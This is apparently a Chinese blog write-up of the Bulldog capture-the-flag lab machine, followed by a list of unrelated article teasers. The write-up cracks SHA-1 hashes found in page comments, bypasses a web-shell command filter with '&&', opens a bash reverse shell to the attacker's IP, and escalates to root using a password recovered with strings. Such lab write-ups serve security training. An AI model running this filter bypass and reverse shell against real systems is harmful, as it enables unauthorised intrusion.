当前位置：首页 > news >正文

bulldog 靶机

news 2026/2/10 4:44:16

bulldog

信息搜集

存活检测

详细扫描

后台网页扫描

网页信息搜集

正在开发的如果你正在读这篇文章，你很可能是Bulldog Industries的承包商。恭喜你!我是你们的新老板，组长艾伦·布鲁克。CEO解雇了整个开发团队和员工。因此，我们需要迅速招到一批人。我要试着给你上一堂牛头犬工业网站的速成课。之前的网站是怎么被攻击的?APT利用了网络服务器上的一个漏洞获得了一个低权限shell。从那里，他们利用脏牛在盒子上生根。在那之后，整个系统被接管，他们破坏了网站。我们仍在从旧系统向新系统过渡。同时，我们正在使用一些文件，这些文件可能是从原始系统中损坏的。我们还没来得及确认有没有被黑的痕迹所以如果你发现了，给我发邮件。我们如何防止未来的违规行为?应Churchy先生的要求，我们将从新服务器上完全移除PHP。此外，我们不会使用PHPMyAdmin或任何其他流行的CMS系统。我们的任务是创造我们自己的。新系统的设计?新网站将完全用Django编写(Mr. Churchy要求“高端技术时髦的东西”)。到目前为止，系统上已经启用了SSH。当我们将转换到使用Web-Shell(一个专有的shell接口)时，这个功能将很快关闭。下面的链接解释了这个工具。另外，请注意，我们将开始使用MongoDB，但是我们还没有完全安装它。还要注意的是，我们将实施一个革命性的AV系统，这是由供应商为我们定制的。它宣称能够每分钟运行一次，以检测入侵和黑客行为。一旦它启动并运行，我们将把它安装到系统上。Web-Shell我该找谁开始呢?组长:alan@bulldogindustries.com备用组长:william@bulldogindustries.com前端:malik@bulldogindustries.com前端:kevin@bulldogindustries.com后端:ashley@bulldogindustries.com后端:nick@bulldogindustries.com数据库:sarah@bulldogindustries.com

在此界面的源码中发现了疑似加密的信息，依次解密查看

Team Lead: alan@bulldogindustries.com<br><!--6515229daf8dbdc8b89fed2e60f107433da5f2cb-->Back-up Team Lead: william@bulldogindustries.com<br><br><!--38882f3b81f8f2bc47d9f3119155b05f954892fb-->Front End: malik@bulldogindustries.com<br><!--c6f7e34d5d08ba4a40dd5627508ccb55b425e279-->Front End: kevin@bulldogindustries.com<br><br><!--0e6ae9fe8af1cd4192865ac97ebf6bda414218a9-->Back End: ashley@bulldogindustries.com<br><!--553d917a396414ab99785694afd51df3a8a8a3e0-->Back End: nick@bulldogindustries.com<br><br><!--ddf45997a7e18a25ad5f5cf222da64814dd060d5-->Database: sarah@bulldogindustries.com<br><!--d8b8dd5e7f000b8dea26ef8428caf38c04466b3e-->.0

管理员登陆

解析密码加密方式
```
hash-identifier
```
sha-1 解密

将密文存储到文件中

john 解密
```
john --format=raw-sha1 pas
```
破解出密文 bulldog
尝试当作密码登录管理员界面

显示登陆成功，但没权限
但此时 /dev/shell 界面可执行指令

反弹 shell

执行允许的命令外的命令会被过滤

尝试绕过

/usr/bin/ping 127.0.0.1 -c 2

失败

pwd&&ping 127.0.0.1 -c 2

可以使用 && 对过滤进行绕过

kali 开启监听

命令框输入链接反弹 shell 命令

pwd&&bash -c "bash -i >& /dev/tcp/10.4.7.132/7777 0>&1"

成功连接

提权

查找敏感文件

查看二进制文件中可打印的字符

strings customPermissionApp

密码

SUPERultimatePASSWORDyouCANTget

切换用户，提示必须在终端执行

创建一个新的终端

python -c 'import pty;pty.spawn("/bin/sh")'

切换 root
```
sudo su root
```
输入密码，提权成功

bulldog 靶机

bulldog 信息搜集存活检测详细扫描后台网页扫描网页信息搜集正在开发的如果你正在读这篇文章，你很可能是Bulldog Industries的承包商。恭喜你!我是你们的新老板，组长艾伦布鲁克。CEO解雇了整个开发团队和员工。因此，我们需要迅速招到一…...

编程日记 2023/10/20 1:52:23

如何借助边缘智能网关打造智慧城市便民驿站

智慧城市驿站是一类提供多样化便利服务的新型智能公共设施，通过融合物联网技术、边缘智能技术、新能源技术等，为城市居民整合提供休闲、购物、卫生、广告、安全等公共服务，进一步提升日常生活体验。本篇就为大家介绍如何基于边缘智能网关&…...

编程日记 2023/10/20 1:51:22

谈谈电商App的压测

背景最近恰逢双十一，大大小小的电商app在双十一之前都会做一次压测，曾经在小公司工作的时候很想知道大公司是如何压测的，有什么高深的压测工具没，本文就来揭露一下压测真相在确认使用什么压测工具进行压测之前，我…...

编程日记 2023/10/20 1:49:21

VsCode修改侧边栏字体大小——用缩放的方法

缩放界面字体百分比（包括编辑器界面） 如果只修改文本编辑区的字体大小，可以在File -> Preferences -> Settings 中修改font的大小。但是侧边栏的字体不会改变，所以可以使用缩放的方法先修改整个界面的字体大小，…...

编程日记 2023/10/20 1:48:19

基于Java的农资采购销售管理系统设计与实现(源码+lw+部署文档+讲解等)

文章目录前言具体实现截图论文参考详细视频演示为什么选择我自己的网站自己的小程序（小蔡coding） 代码参考数据库参考源码获取前言 💗博主介绍：✌全网粉丝10W,CSDN特邀作者、博客专家、CSDN新星计划导师、全栈领域优质创作者&am…...

编程日记 2023/10/20 1:47:18

【AIGC核心技术剖析】扩大富有表现力的人体姿势和形状估计SMPLer-X模型

富有表现力的人体姿势和形状估计 (EHPS) 将身体、手和面部运动捕捉与众多应用结合起来。尽管取得了令人鼓舞的进展，但当前最先进的方法仍然在很大程度上依赖于有限的训练数据集。在这项工作中，我们研究了将 EHPS 扩展到第一个通用基础模型（称为 SMPLer-X），以 ViT-Huge 作为…...

编程日记 2023/10/20 1:46:17

【C++面向对象】1. 类、对象

文章目录【 1. 类 & 对象的定义】1.1 类的定义1.2 对象的定义【 2. 类的成员】2.1 数据成员2.2 成员函数类的内部定义成员函数类的外部定义成员函数成员函数的访问实例【 3. 类的访问修饰符】3.1 public 公有成员3.2 private 私有成员3.3 protected 保护成员3.4 继承…...

编程日记 2023/10/20 1:45:16

PAM从入门到精通（十三）

接前一篇文章：PAM从入门到精通（十二） 本文参考： 《The Linux-PAM Application Developers Guide》先再来重温一下PAM系统架构： 更加形象的形式： 五、主要函数详解 11. pam_open_session 概述&…...

编程日记 2023/10/20 1:44:15

Stable Diffusion WebUI几种解决手崩溃的方法

1. 添加与手相关负面提示词如何提价提示词呢？首先有一个embeddings模型文件bad-hands-5，我们可以去各个大模型网站去搜，我是在C站上面下载的。附上C站地址：https://civitai.com/ 下载好之后，你需要将文件放入stable-diffusion-webui\embeddings目录中。位置如下所示…...

编程日记 2023/10/20 1:42:12

kr 第三阶段（一）16 位汇编

为什么要学习 16 位汇编？ 16 位汇编包含了大部分 32 位汇编的知识点。有助于在学习内核的两种模式。实模式：访问真实的物理内存保护模式：访问虚拟内存有助于提升调试能力，调试命令与 OllyDbg 和 WinDebug 通用。可以学习实现反…...

编程日记 2023/10/20 1:41:10

power point导出pdf保留字体

在 slides 中用到非自带的字体，如 [1]，想导出成 pdf 文件（因为导出成图，如 png，放大会蒙），并在别人电脑里也保留字体。除了让别人也装上相应字体，可以： 参考 [2]&#x…...

编程日记 2023/10/20 1:40:09

云务器迁移（腾讯云＞华为云）

自己平时除了写些bug外还喜欢玩玩服务器，这不前几年买了一个域名，当时服务器买的是阿里云的，想着域名备案挺麻烦的就一直用着，只是在服务器到期后会重新购买其他运营商的（关键是续不起🤫） 这不最…...

编程日记 2023/10/20 1:39:08

[USACO11MAR] Brownie Slicing G题解(二分+二维前缀和+矩阵分割）

[USACO11MAR] Brownie Slicing G 题目地址 P3017 [USACO11MAR] Brownie Slicing G 思路二分最大化最小值切割思路： 一行一行进行切割，如果这一行可以切割出b块大于等于mid的块，就开始切割下一行如果无法切割出b块，就把正在…...

编程日记 2023/10/20 1:38:07

【每日一题】—— B. Arrays Sum （Grakn Forces 2020）

🌏博客主页：PH_modest的博客主页 🚩当前专栏：每日一题 💌其他专栏： 🔴 每日反刍 🟡 C跬步积累 🟢 C语言跬步积累 🌈座右铭：广积粮，缓称…...

编程日记 2023/10/20 1:37:06

XTU-OJ 1328-数码和

题目描述一个10进制数n在2∼16进制下可以得到的不同的数码和，求在这些数码和中出现次数最多的数码和。比如20， 进制2345678910111213141516数码10100202110403226242220191817161514数码和2424586421098765 其中数码和2和4分别出现了3次，为…...

编程日记 2023/10/20 1:36:05

混入组件 (mixin)

1 什么是混入以及作用 *混入 (mixin) 提供了一种非常灵活的方式，来分发 Vue 组件中的可复用功能。一个混入对象可以包含任意组件选项。当组件使用混入对象时，所有混入对象的选项将被“混合”进入该组件本身的选项。作用：主要作用是继承和封装…...

编程日记 2023/10/20 1:35:04

ubuntu18.04 RTX3060 rangnet++训练

代码链接： https://github.com/PRBonn/lidar-bonnetal 安装anaconda环境为 CUDA 11.0（11.1也可以） anaconda环境如下 numpy1.17.2 torchvision0.2.2 matplotlib2.2.3 tensorflow1.13.1 scipy0.19.1 pytorch1.7.1 vispy0.5.3 opencv_python…...

编程日记 2023/10/20 1:34:03

HZOJ-72：猜拳

题目描述在一次聚会中，每人拿着一张印有石头、剪刀、布的卡片，每个人具体拿得是哪种卡片不得而知。现在告诉你某些人之间的胜负关系，并会询问某两个人之间的对战结果，人按照从 11 到 n� 编号。对于每个…...

编程日记 2023/10/20 1:33:02

【Django 03】QuerySet 和 Instance应用

1. DRF QuerySet 和 Instance功能概述 1.1 QuerySet 从数据库中查询结果存放的集合称为 QuerySet。 Django ORM用到三个类：Manager、QuerySet、Model。每个Model都有一个默认的 manager实例，名为objects。Django的ORM通过Mode的objects属性提供各种数据…...

编程日记 2023/10/20 1:32:02

安装 mysql

gpt: 要在 Debian 11 上安装 MySQL 数据库服务器，您可以使用以下步骤： 1. **更新软件包列表**：在安装任何软件之前，始终建议首先更新软件包列表，以确保获取最新的软件包信息。在终端中运行以下命令： bash…...

编程日记 2023/10/20 1:31:01

SkyWalking 10.2.0 SWCK 配置过程

SkyWalking 10.2.0 & SWCK 配置过程 skywalking oap-server & ui 使用Docker安装在K8S集群以外，K8S集群中的微服务使用initContainer按命名空间将skywalking-java-agent注入到业务容器中。 SWCK有整套的解决方案，全安装在K8S群集中。具体可参…...

编程新知 2025/8/23 5:51:08

（十）学生端搭建

本次旨在将之前的已完成的部分功能进行拼装到学生端，同时完善学生端的构建。本次工作主要包括： 1.学生端整体界面布局 2.模拟考场与部分个人画像流程的串联 3.整体学生端逻辑一、学生端在主界面可以选择自己的用户角色选择学生则进入学生登录界面…...

编程新知 2026/2/5 4:23:32

线程同步：确保多线程程序的安全与高效！

全文目录： 开篇语前序前言第一部分：线程同步的概念与问题1.1 线程同步的概念1.2 线程同步的问题1.3 线程同步的解决方案第二部分：synchronized关键字的使用2.1 使用 synchronized修饰方法2.2 使用 synchronized修饰代码块第三部分&#xff…...

编程新知 2025/9/24 16:02:40

Python实现prophet 理论及参数优化

文章目录 Prophet理论及模型参数介绍Python代码完整实现prophet 添加外部数据进行模型优化之前初步学习prophet的时候，写过一篇简单实现，后期随着对该模型的深入研究，本次记录涉及到prophet 的公式以及参数调优，从公式可以更直观…...

编程新知 2026/1/27 5:01:54

Linux --进程控制

本文从以下五个方面来初步认识进程控制： 目录进程创建进程终止进程等待进程替换模拟实现一个微型shell 进程创建在Linux系统中我们可以在一个进程使用系统调用fork()来创建子进程，创建出来的进程就是子进程，原来的进程为父进程。…...

编程新知 2026/1/30 15:27:25

AI病理诊断七剑下天山，医疗未来触手可及

一、病理诊断困局：刀尖上的医学艺术 1.1 金标准背后的隐痛病理诊断被誉为"诊断的诊断"，医生需通过显微镜观察组织切片，在细胞迷宫中捕捉癌变信号。某省病理质控报告显示，基层医院误诊率达12%-15%，专家会诊…...

编程新知 2026/2/6 20:53:34

在QWebEngineView上实现鼠标、触摸等事件捕获的解决方案

这个问题我看其他博主也写了，要么要会员、要么写的乱七八糟。这里我整理一下，把问题说清楚并且给出代码，拿去用就行，照着葫芦画瓢。问题在继承QWebEngineView后，重写mousePressEvent或event函数无法捕获鼠标按下事…...

编程新知 2025/6/11 3:07:32

Linux 内存管理实战精讲：核心原理与面试常考点全解析

Linux 内存管理实战精讲：核心原理与面试常考点全解析 Linux 内核内存管理是系统设计中最复杂但也最核心的模块之一。它不仅支撑着虚拟内存机制、物理内存分配、进程隔离与资源复用，还直接决定系统运行的性能与稳定性。无论你是嵌入式开发者、内核调试工…...

编程新知 2026/1/25 10:16:57

A2A JS SDK 完整教程：快速入门指南

目录什么是 A2A JS SDK?A2A JS 安装与设置A2A JS 核心概念创建你的第一个 A2A JS 代理A2A JS 服务端开发A2A JS 客户端使用A2A JS 高级特性A2A JS 最佳实践A2A JS 故障排除什么是 A2A JS SDK? A2A JS SDK 是一个专为 JavaScript/TypeScript 开发者设计的强大库&#xff…...

编程新知 2025/12/12 8:42:24

c++第七天继承与派生2

这一篇文章主要内容是派生类构造函数与析构函数在派生类中重写基类成员以及多继承第一部分：派生类构造函数与析构函数当创建一个派生类对象时，基类成员是如何初始化的？ 1.当派生类对象创建的时候，基类成员的初始化顺序 …...

编程新知 2026/2/2 21:55:02